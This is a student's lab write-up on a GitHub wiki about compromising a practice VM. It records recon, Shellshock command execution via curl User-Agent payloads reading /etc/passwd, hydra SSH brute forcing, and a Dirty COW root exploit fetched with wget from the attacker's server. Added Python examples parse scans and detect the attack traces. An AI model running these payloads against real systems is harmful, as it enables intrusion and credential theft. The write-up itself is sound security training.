Activity 4.1 - Zacham17/my-tech-journal GitHub Wiki

Activity 4.1: Exploiting Cupcake

This page will cover activity 4.1 and also act as notes for subjects such as using nmaptocsv, remote code execution, and running privilege escalation exploits.

Active Recon

  • I ran an nmap scan on the target, cupcake.shire.org, at 10.0.5.23 for ports 1-6000 to find running services.
    • The command I used is sudo nmap -A -sV -O -p 1-6000 10.0.5.23
  • The scan revealed the open ports and services running, which were OpenSSH 5.3 on port 22, and Apache httpd 2.2.15.
  • I also found that Linux 2.6.32 is running on the machine.
  • With an online search, I was able to determine that the CentOS version running is version 6.X. It is difficult to determine the exact release.
    • The source I used can be found here
  • I also navigated to the Apache httpd server in a web browser to access the cgi-bin/status file.

Using nmaptocsv

  • I installed nmaptocsv using the commands sudo apt update, sudo apt install python3-pip, and sudo pip install nmaptocsv in that order.
  • I then ran the command sudo nmap -sT -sV -p 1-1000 10.0.5.23 -Pn -oG top1000.txt to scan ports 1-1000 on 10.0.5.23 and output the results into top1000.txt in a greppable format.
  • I then used the command nmaptocsv -i top1000.txt -d "," to output the contents of top1000.txt in CSV format, which I was able to copy into a spreadsheet.
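For reference, this is what the conversion step above does to greppable output. The parser below is an added example (not from this page or from nmaptocsv) that reads the -oG format, one Host: line carrying a tab-separated Ports: section in which each entry is port/state/proto/owner/service/rpcinfo/version, and emits CSV rows; the sample scan output is constructed, not captured.

```python
import csv
import io

# Constructed sample of nmap greppable (-oG) output, modelled on the scan
# above; the service strings are illustrative, not captured output.
SAMPLE_GNMAP = """\
# Nmap scan initiated as: nmap -sT -sV -p 1-1000 10.0.5.23 -Pn -oG top1000.txt
Host: 10.0.5.23 (cupcake.shire.org)\tStatus: Up
Host: 10.0.5.23 (cupcake.shire.org)\tPorts: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/, 443/closed/tcp//https///\tIgnored State: closed (997)
# Nmap done -- 1 IP address (1 host up) scanned
"""

COLUMNS = ["host", "hostname", "port", "state", "proto", "service", "version"]


def parse_gnmap(text, open_only=True):
    """Return one dict per port entry in -oG output (open ports by default)."""
    rows = []
    for line in text.splitlines():
        # Port data lives only on 'Host:' lines that carry a 'Ports:' section;
        # comment lines and the 'Status: Up' line are skipped.
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        sections = line.split("\t")
        ip, _, rest = sections[0][len("Host: "):].partition(" (")
        hostname = rest.rstrip(")")
        ports = next(s for s in sections if s.startswith("Ports: "))
        for entry in ports[len("Ports: "):].split(", "):
            # Each entry is port/state/proto/owner/service/rpcinfo/version/
            # pad so entries with empty trailing fields still yield 7 columns.
            f = (entry.split("/") + [""] * 7)[:7]
            if open_only and f[1] != "open":
                continue
            rows.append(dict(zip(COLUMNS, [ip, hostname, f[0], f[1], f[2], f[4], f[6]])))
    return rows


def to_csv(rows, delimiter=","):
    """Render the parsed rows as CSV text ready to paste into a spreadsheet."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=COLUMNS, delimiter=delimiter, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    print(to_csv(parse_gnmap(SAMPLE_GNMAP)))
```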

Vulnerability Detection

Using information gathered about the target host's operating system and web service, I searched online for exploits and vulnerabilities that could be used. I found that there are various exploits on Apache version 2.2.15, some of which involve remote command execution or authentication bypass. One exploit is called Shellshock, and it is a remote code execution exploit.

My sources are below:

Remote Code Execution

Nmap

  • One command that I used to remotely execute commands is nmap. I used this command: sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -s -r -v" 10.0.5.23
    • That command uses nmap arguments to remotely execute the uname command to retrieve the running kernel version.

Curl

  • One command that I used to remotely execute commands is curl.
  • I used the command curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.0.5.23/cgi-bin/status
    • That command executes a chosen command by exploiting the web server. Here it uses the cat command to output the contents of the /etc/passwd file.
  • I also used this command: curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat status' bash -s :'' http://10.0.5.23/cgi-bin/status
    • That command uses curl to execute a chosen command on 10.0.5.23 by exploiting the web server. Here it uses the cat command to output the code behind the status CGI script.
  • A third command that I used is curl -H 'User-Agent: () { :; }; echo ; echo ; /sbin/ifconfig' bash -s :'' http://10.0.5.23/cgi-bin/status
    • That command uses curl to execute a chosen command remotely by exploiting the web server. Here it uses the ifconfig command to output the network information of the exploited host.

Making a Password List

  • I used the /usr/share/wordlists/rockyou.txt.gz file to help create a list of potential passwords for the samwise user.
  • I first extracted the rockyou.txt.gz file using sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
  • I then used the command cat /usr/share/wordlists/rockyou.txt | grep -i "samwise" > passwordlist.txt to gather a list of possible passwords for the samwise user.

Brute Force Password Cracking

  • I used the command hydra -l samwise -P passwordlist.txt 10.0.5.23 -t 4 ssh to determine the password for the samwise user, using passwordlist.txt.
  • Before testing out the ssh, I had to create and edit the ~/.ssh/config file by adding the lines:
    HostkeyAlgorithms +ssh-rsa
    PubkeyAcceptedAlgorithms +ssh-rsa
  • This allowed me to ssh to 10.0.5.23.

  • I was then able to ssh into 10.0.5.23 using the samwise user and the password.
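A dictionary attack like the hydra run above is noisy on the target: sshd logs one "Failed password" line per guess, all for the same user from the same source, and then an "Accepted password" line when a guess lands. The script below is an added example (not from the page) that counts failures per (user, source) pair over constructed CentOS-style /var/log/secure lines and flags pairs over a threshold, noting whether the same source also has an accepted login.

```python
import re
from collections import Counter

# Constructed sshd entries in /var/log/secure format: a burst of failures for
# one user from one source, an unrelated failure, then a success.
SAMPLE_SECURE_LOG = """\
Oct  5 12:10:01 cupcake sshd[2101]: Failed password for samwise from 10.0.99.53 port 40111 ssh2
Oct  5 12:10:01 cupcake sshd[2102]: Failed password for samwise from 10.0.99.53 port 40112 ssh2
Oct  5 12:10:02 cupcake sshd[2103]: Failed password for samwise from 10.0.99.53 port 40113 ssh2
Oct  5 12:10:02 cupcake sshd[2104]: Failed password for samwise from 10.0.99.53 port 40114 ssh2
Oct  5 12:10:03 cupcake sshd[2105]: Failed password for invalid user admin from 10.0.5.7 port 50001 ssh2
Oct  5 12:10:03 cupcake sshd[2106]: Failed password for samwise from 10.0.99.53 port 40115 ssh2
Oct  5 12:10:04 cupcake sshd[2107]: Accepted password for samwise from 10.0.99.53 port 40116 ssh2
"""

# "invalid user" is inserted by sshd when the account does not exist.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port"
)
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port"
)


def detect_ssh_bruteforce(log_text, threshold=5):
    """Return (user, ip) pairs with at least `threshold` failed logins, each
    marked with whether that same pair also produced an accepted login."""
    failures = Counter()
    successes = set()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[(m.group("user"), m.group("ip"))] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            successes.add((m.group("user"), m.group("ip")))
    return [
        {"user": user, "ip": ip, "failures": count, "accepted_from_same_source": (user, ip) in successes}
        for (user, ip), count in failures.items()
        if count >= threshold
    ]


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_SECURE_LOG):
        print(alert)
```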

Root Compromise

Using Searchsploit

  • I searched for known exploits for the Linux kernel version of the target host using the command searchsploit Linux Kernel 2.6. The command provided a list of known exploits for that kernel version.
  • I decided to use exploit 40839, which is a "Dirty COW" race condition privilege escalation exploit. The exploit creates a user with root privileges.
  • I used the command searchsploit -m 40839 to download the exploit code.

Performing the Exploit

  • I started a web server on my Kali VM on port 8017 using python3 -m http.server 8017.
  • I used ssh to access the target host as the samwise user. I then used the command wget http://10.0.99.53:8017/40839.c to retrieve the exploit from my Kali VM.
  • On the target host, I used the command gcc 40839.c -o dirtycow -lpthread -lcrypt to compile the exploit into a program.
  • I executed the program by typing ./dirtycow. I then entered a password as requested and let the program run. The program rewrites the /etc/passwd file to add a root user with the provided password.
  • After the program succeeded, a new user called "firefart" had been created with the password I provided. The "firefart" user also has root access/permissions.
  • Lastly, I made sure to revert any changes that were made in the exploit process in order for the system to be in an exploitable state for the next user to attempt an exploit.
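The exploit leaves an artefact a host check can catch: on a shadow-password system every /etc/passwd entry has "x" in the password field and only root should hold UID 0, so an extra UID 0 account with a hash written inline stands out. The audit below is an added example (not part of the page or the exploit) run over constructed passwd contents; the "firefart" name comes from the page, the hash is a placeholder, and the GECOS text is made up.

```python
# Constructed /etc/passwd contents: a clean shadow-password layout, and the
# same file after an extra UID 0 account has been written into it (the
# account name follows the page; the hash is a placeholder, not a real one).
PASSWD_CLEAN = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
samwise:x:500:500::/home/samwise:/bin/bash
"""

PASSWD_TAMPERED = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
samwise:x:500:500::/home/samwise:/bin/bash
firefart:$6$CONSTRUCTED$PLACEHOLDERHASH:0:0:constructed:/root:/bin/bash
"""


def audit_passwd(text):
    """Return findings for entries that should never appear in /etc/passwd on a
    shadow-password system: non-root UID 0 accounts, a password field other
    than the 'x' marker, UIDs shared by several names, and a missing root."""
    findings = []
    names_by_uid = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry with {len(fields)} fields")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: non-root account '{name}' has UID 0")
        if pw != "x":
            findings.append(f"line {lineno}: password field for '{name}' is not shadowed")
        names_by_uid.setdefault(uid, []).append(name)
    for uid, names in names_by_uid.items():
        if len(names) > 1:
            findings.append(f"UID {uid} is shared by: {', '.join(names)}")
    if "root" not in names_by_uid.get("0", []):
        findings.append("no 'root' entry with UID 0 present")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_TAMPERED):
        print(finding)
```

The same check is worth running on the reverted system, since the page's clean-up step is what restores the lab host for the next attempt.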

Reflection:

This activity was a good introduction to taking advantage of exploits on certain systems and how to find the exploits in the first place. I learned about using nmaptocsv to create spreadsheets with important scan information. I also learned about using commands such as nmap and curl to perform remote code execution. It is also useful to know about the rockyou.txt.gz file, and how to parse it for passwords to turn into a list. Something else new to me in this activity was the use of hydra for brute-force password cracking, as well as using searchsploit to find exploits for specific kernel versions of a system. Lastly, I enjoyed getting experience with implementing an exploit on a system to escalate privileges on that system. It really solidifies the fact that security measures need to be taken to prevent such exploits. I didn't have much trouble in this activity, but I feel like I learned a lot.

Notes Added to: